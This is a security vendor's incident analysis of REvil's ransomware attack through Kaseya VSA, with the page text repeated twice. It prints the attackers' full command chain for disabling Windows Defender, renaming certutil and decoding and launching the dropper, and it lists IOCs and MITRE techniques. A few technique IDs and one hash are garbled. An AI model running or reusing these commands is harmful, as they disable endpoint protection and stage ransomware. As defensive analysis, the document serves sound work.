Ransomware
mins read

Kaseya VSA Supply Chain Ransomware Incident

Kaseya VSA Supply Chain Ransomware Incident

July 14, 2021
Green Alert
Last Update posted on
February 3, 2024
Proactive Monitoring of the Dark Web for your organization

Proactively monitor and defend against malware with CloudSEK XVigil Malware Logs module, ensuring the integrity of your digital assets

Schedule a Demo
Table of Contents
Author(s)
No items found.

On 02 July 2021, Kaseya, an IT solutions developer catering to managed service providers (MSPs), disclosed that they were the victim of a large-scale ransomware attack. The attack, which was propagated by the popular RaaS group REvil, targeted Kaseya’s VSA infrastructure, compromising its supply chains. The ransomware group exploited a specific zero-day authentication vulnerability in the application to upload a malicious Base64 encoded file, infecting client infrastructure that has a VSA agent program running on the target servers.

Supply Chain Delivery Vector

Kaseya’s VSA is a Remote Monitoring and Management (RMM) software that enables MSPs to perform patch management, backups, and client monitoring for customers. The threat actors leveraged a zero-day authentication bypass vulnerability in the web interface of VSA, to gain an authenticated session, upload payload, and execute a series of commands via SQL to gain command execution. The ransomware was delivered as a software update masquerading as “Kaseya VSA Agent Hot-fix.” This procedure deployed an encryptor, which compromised the VSA server and was dropped in TempPath, under the filename “agent.crt.”

The payload file “agent.crt” is sent to an agent monitor program (C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, where ID is identification key for the server connected to the monitor instance), which monitors customer endpoints and determines if a terminal requires patching or updates, only to install them silently in the background. The agent monitor then writes “agent.crt” to the VSA agent working directory (C:\KWORKING\AGENT.crt).

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Execution

The following command is used to delay or disable the execution of PowerShell commands:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul

Followed by which, a PowerShell command is executed by the Agent monitor, as shown below:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference 

  • DisableRealtimeMonitoring $true
  • DisableIntrusionPreventionSystem $true 
  • DisableIOAVProtection $true 
  • DisableScriptScanning $true 
  • EnableControlledFolderAccess Disabled 
  • EnableNetworkProtection AuditMode -Force 
  • MAPSReporting Disabled 
  • SubmitSamplesConsent NeverSend

These commands disable various protections implemented on the target system, specifically features of Windows Defender, such as network protection, IOfficeAntiVirus (IOAV), script scanning, MAPS Reporting, etc.

The following command creates a copy of the “certutil.exe” file, a certificate management utility present in all Windows versions, from the default location to Windows Directory and renames it as “cert.exe”: 

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

This command-line appends random data to the end of cert.exe to change its signature, which helps to evade anti-malware security products:

echo %RANDOM% >> C:\Windows\cert.exe

The next command decodes the “agent.crt” file to “agent.exe”:

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe 

Followed by which, this command line cleans up the file and executes “agent.exe”:

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Agent.exe: The Dropper

Agent.exe is a dropper that downloads the following artifacts:

Artifacts Description
MsMpEng.exe Windows Defender component signed by Microsoft
Mpsvc.dll Part of MsMpEng.exe

REvil uses a particular version of “MsMpEng.exe,” which is vulnerable to Dynamic-link library (DLL) sideloading, which is a popular cyber attack method that takes advantage of how applications handle DLL files. It uses malicious DLL files instead of legitimate ones, which is then loaded and executed, infecting the target server.

Deployment of Ransomware Locker

A Ransomware Locker is hidden in the “mpsvc.dll” file and is executed when “MsMpEng.exe” is executed by the file “agent.exe”. This is an evasion tactic employed by the threat actor to bypass security checks.

MITRE ATT&CK Tactics and Techniques

Initial Access T1059.002 Supply Chain Compromise: Compromise Software Supply Chain
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Persistence & Privilege Escalation T1574.002 Hijack Execution Flow: DLL Side-Loading
Defence Evasion T1036.003 Masquerading: Rename System Utilities
T1562.001 Impair Defenses: Disable or Modify Tools
T1140 Deobfuscate/Decode Files or Information
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1070.004 Indicator Removal on Host: File Deletion
T112 Modify Registry
T1553.002 Subvert Trust Controls: Code Signing
Impact T1486 Data Encrypted for Impact
Files C:\kworking\agent.exe (REvil Dropper)

Indicators of Compromise

Type Indicator
  • SHA-256
  • SHA-1
  • MD5
  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  • 5162f14d75e96edb914d1756349d6e11583db0b0
  • 561cffbaba71a6e8cc1cdceda990ead4
  • SHA-256
  • SHA-1
  • MD5
  • df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
  • 682389250d914b95d6c23ab29dffee11cb65cae9
  • 0299e3c2536543885860c7b61e1efc3f
  • SHA-256
  • SHA-1
  • MD5
  • dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
  • 8118474606a68c03581eef85a05a90275aa1ec24
  • 835f242dde220cc76ee5544119562268
  • SHA-256
  • SHA-1
  • MD5
  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  • 5162f14d75e96edb914d1756349d6e11583db0b05162f14d75e96edb914d1756349d6e11583db0b0
  • 561cffbaba71a6e8cc1cdceda990ead4
  • SHA-256
  • SHA-1
  • MD5
  • 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
  • 20e3a0955baca4dc7f1f36d3b865e632474add77
  • 5a97a50e45e64db41049fd88a75f2dd2
  • SHA-256
  • SHA-1
  • MD5
  • 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
  • 13d57aba8df4c95185c1a6d2f945d65795ee825b
  • be6c46239e9c753de227bf1f3428e271
  • SHA-256
  • SHA-1
  • MD5
  • 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
  • 3c2b0dcdb2a46fc1ec0a12a54309e35621caa925
  • 18786bfac1be0ddf23ff94c029ca4d63
  • C:\Windows\mpsvc.dll (REvil / Sodinokibi DLL)
  • SHA-256
  • SHA-1
  • MD5
  • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
  • 656c4d285ea518d90c1b669b79af475db31e30b1
  • a47cf00aedf769d60d58bfe00c0b5421
  • SHA-256
  • SHA-1
  • MD5
  • e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
  • e1d689bf92ff338752b8ae5a2e8d75586ad2b67b
  • 7ea501911850a077cf0f9fe6a7518859
  • SHA-256
  • SHA-1
  • MD5
  • d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
  • 1bcf1ae39b898aaa8b6b0207d7e307b234614ff6
  • 849fb558745e4089a8232312594b21d2
  • SHA-256
  • SHA-1
  • MD5
  • d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
  • 7895e4d017c3ed5edb9bf92c156316b4990361eb
  • 4a91cb0705539e1d09108c60f991ffcf
  • SHA-256
  • SHA-1
  • MD5
  • cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
  • 45c1b556f5a875b71f2286e1ed4c7bd32e705758
  • 7d1807850275485397ce2bb218eff159
  • SHA-256
  • SHA-1
  • MD5
  • 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
  • c0f569fc22cb5dd8e02e44f85168b4b72a6669c3
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • SHA-256
  • SHA-1
  • MD5
  • 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f
  • c2bb3eef783c18d9825134dc8b6e9cc261d4cca7
  • a560890b8af60b9824c73be74ef24a46

C:\Windows\cert.exe
  • SHA256
  • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752

(Note: Using this hash is ineffective since it is a random character added version of the certutil.exe file. You should use behavior-based detection, for example, renaming/copying certutil.exe)
C:\windows\msmpeng.exe
  • SHA-256
  • SHA-1
  • MD5
  • 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • 3d409b39b8502fcd23335a878f2cbdaf6d721995
  • 8cc83221870dd07144e63df594c391d9

(Note: This file is an older version of Windows Defender. It is a legitimate binary, but it is used for malicious purposes by adversaries like other living off the land tools.)
C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe (Legitimate Kaseya VSA binary used for remote execution)

 

Domains https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txt
YARA Rules https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rules
Registry Keys HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter

 

 

References

https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident

https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

https://www.picussecurity.com/resource/blog/revil-sodinokibi-ransomware-kaseya-vsa-msp-supply-chain-attack

Author

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
Blog Image
Emerging Threats
December 7, 2023

Exploring the Dark Web: Understanding Cybersecurity Threats and Safeguarding Strategies

Discover how to navigate and protect against Dark Web threats. Learn about cyber risks, real-time monitoring, and securing your digital presence.

Blog Image
Ransomware
November 4, 2023

Underground Marketplace Unveils New Ransomware Offering QBit with Advanced Encryption & Customization

On 23 October 2023, CloudSEK’s Threat Intelligence Team detected a Ransomware-as-a-Service (RaaS) group, named QBit introducing a newly developed ransomware written in Go, boasting advanced features to optimize its malicious operations.

Blog Image
Ransomware
September 8, 2023

Understanding Knight Ransomware: Advisory, Analysis

Cyclops, now renamed as Knight also known as Cyclops 2.0, debuted in May 2023. The Cyclops group has successfully developed ransomware that can infect all three major platforms: Windows, Linux, macOS, ESXi and Android.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
Ransomware

min read

Kaseya VSA Supply Chain Ransomware Incident

Kaseya VSA Supply Chain Ransomware Incident

Authors
Co-Authors
No items found.

On 02 July 2021, Kaseya, an IT solutions developer catering to managed service providers (MSPs), disclosed that they were the victim of a large-scale ransomware attack. The attack, which was propagated by the popular RaaS group REvil, targeted Kaseya’s VSA infrastructure, compromising its supply chains. The ransomware group exploited a specific zero-day authentication vulnerability in the application to upload a malicious Base64 encoded file, infecting client infrastructure that has a VSA agent program running on the target servers.

Supply Chain Delivery Vector

Kaseya’s VSA is a Remote Monitoring and Management (RMM) software that enables MSPs to perform patch management, backups, and client monitoring for customers. The threat actors leveraged a zero-day authentication bypass vulnerability in the web interface of VSA, to gain an authenticated session, upload payload, and execute a series of commands via SQL to gain command execution. The ransomware was delivered as a software update masquerading as “Kaseya VSA Agent Hot-fix.” This procedure deployed an encryptor, which compromised the VSA server and was dropped in TempPath, under the filename “agent.crt.”

The payload file “agent.crt” is sent to an agent monitor program (C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, where ID is identification key for the server connected to the monitor instance), which monitors customer endpoints and determines if a terminal requires patching or updates, only to install them silently in the background. The agent monitor then writes “agent.crt” to the VSA agent working directory (C:\KWORKING\AGENT.crt).

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Execution

The following command is used to delay or disable the execution of PowerShell commands:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul

Followed by which, a PowerShell command is executed by the Agent monitor, as shown below:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference 

  • DisableRealtimeMonitoring $true
  • DisableIntrusionPreventionSystem $true 
  • DisableIOAVProtection $true 
  • DisableScriptScanning $true 
  • EnableControlledFolderAccess Disabled 
  • EnableNetworkProtection AuditMode -Force 
  • MAPSReporting Disabled 
  • SubmitSamplesConsent NeverSend

These commands disable various protections implemented on the target system, specifically features of Windows Defender, such as network protection, IOfficeAntiVirus (IOAV), script scanning, MAPS Reporting, etc.

The following command creates a copy of the “certutil.exe” file, a certificate management utility present in all Windows versions, from the default location to Windows Directory and renames it as “cert.exe”: 

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

This command-line appends random data to the end of cert.exe to change its signature, which helps to evade anti-malware security products:

echo %RANDOM% >> C:\Windows\cert.exe

The next command decodes the “agent.crt” file to “agent.exe”:

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe 

Followed by which, this command line cleans up the file and executes “agent.exe”:

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Agent.exe: The Dropper

Agent.exe is a dropper that downloads the following artifacts:

Artifacts Description
MsMpEng.exe Windows Defender component signed by Microsoft
Mpsvc.dll Part of MsMpEng.exe

REvil uses a particular version of “MsMpEng.exe,” which is vulnerable to Dynamic-link library (DLL) sideloading, which is a popular cyber attack method that takes advantage of how applications handle DLL files. It uses malicious DLL files instead of legitimate ones, which is then loaded and executed, infecting the target server.

Deployment of Ransomware Locker

A Ransomware Locker is hidden in the “mpsvc.dll” file and is executed when “MsMpEng.exe” is executed by the file “agent.exe”. This is an evasion tactic employed by the threat actor to bypass security checks.

MITRE ATT&CK Tactics and Techniques

Initial Access T1059.002 Supply Chain Compromise: Compromise Software Supply Chain
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Persistence & Privilege Escalation T1574.002 Hijack Execution Flow: DLL Side-Loading
Defence Evasion T1036.003 Masquerading: Rename System Utilities
T1562.001 Impair Defenses: Disable or Modify Tools
T1140 Deobfuscate/Decode Files or Information
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1070.004 Indicator Removal on Host: File Deletion
T112 Modify Registry
T1553.002 Subvert Trust Controls: Code Signing
Impact T1486 Data Encrypted for Impact
Files C:\kworking\agent.exe (REvil Dropper)

Indicators of Compromise

Type Indicator
  • SHA-256
  • SHA-1
  • MD5
  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  • 5162f14d75e96edb914d1756349d6e11583db0b0
  • 561cffbaba71a6e8cc1cdceda990ead4
  • SHA-256
  • SHA-1
  • MD5
  • df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
  • 682389250d914b95d6c23ab29dffee11cb65cae9
  • 0299e3c2536543885860c7b61e1efc3f
  • SHA-256
  • SHA-1
  • MD5
  • dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
  • 8118474606a68c03581eef85a05a90275aa1ec24
  • 835f242dde220cc76ee5544119562268
  • SHA-256
  • SHA-1
  • MD5
  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  • 5162f14d75e96edb914d1756349d6e11583db0b05162f14d75e96edb914d1756349d6e11583db0b0
  • 561cffbaba71a6e8cc1cdceda990ead4
  • SHA-256
  • SHA-1
  • MD5
  • 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
  • 20e3a0955baca4dc7f1f36d3b865e632474add77
  • 5a97a50e45e64db41049fd88a75f2dd2
  • SHA-256
  • SHA-1
  • MD5
  • 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
  • 13d57aba8df4c95185c1a6d2f945d65795ee825b
  • be6c46239e9c753de227bf1f3428e271
  • SHA-256
  • SHA-1
  • MD5
  • 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
  • 3c2b0dcdb2a46fc1ec0a12a54309e35621caa925
  • 18786bfac1be0ddf23ff94c029ca4d63
  • C:\Windows\mpsvc.dll (REvil / Sodinokibi DLL)
  • SHA-256
  • SHA-1
  • MD5
  • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
  • 656c4d285ea518d90c1b669b79af475db31e30b1
  • a47cf00aedf769d60d58bfe00c0b5421
  • SHA-256
  • SHA-1
  • MD5
  • e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
  • e1d689bf92ff338752b8ae5a2e8d75586ad2b67b
  • 7ea501911850a077cf0f9fe6a7518859
  • SHA-256
  • SHA-1
  • MD5
  • d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
  • 1bcf1ae39b898aaa8b6b0207d7e307b234614ff6
  • 849fb558745e4089a8232312594b21d2
  • SHA-256
  • SHA-1
  • MD5
  • d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
  • 7895e4d017c3ed5edb9bf92c156316b4990361eb
  • 4a91cb0705539e1d09108c60f991ffcf
  • SHA-256
  • SHA-1
  • MD5
  • cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
  • 45c1b556f5a875b71f2286e1ed4c7bd32e705758
  • 7d1807850275485397ce2bb218eff159
  • SHA-256
  • SHA-1
  • MD5
  • 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
  • c0f569fc22cb5dd8e02e44f85168b4b72a6669c3
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • SHA-256
  • SHA-1
  • MD5
  • 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f
  • c2bb3eef783c18d9825134dc8b6e9cc261d4cca7
  • a560890b8af60b9824c73be74ef24a46

C:\Windows\cert.exe
  • SHA256
  • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752

(Note: Using this hash is ineffective since it is a random character added version of the certutil.exe file. You should use behavior-based detection, for example, renaming/copying certutil.exe)
C:\windows\msmpeng.exe
  • SHA-256
  • SHA-1
  • MD5
  • 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • 3d409b39b8502fcd23335a878f2cbdaf6d721995
  • 8cc83221870dd07144e63df594c391d9

(Note: This file is an older version of Windows Defender. It is a legitimate binary, but it is used for malicious purposes by adversaries like other living off the land tools.)
C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe (Legitimate Kaseya VSA binary used for remote execution)

 

Domains https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txt
YARA Rules https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rules
Registry Keys HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter

 

 

References

https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident

https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

https://www.picussecurity.com/resource/blog/revil-sodinokibi-ransomware-kaseya-vsa-msp-supply-chain-attack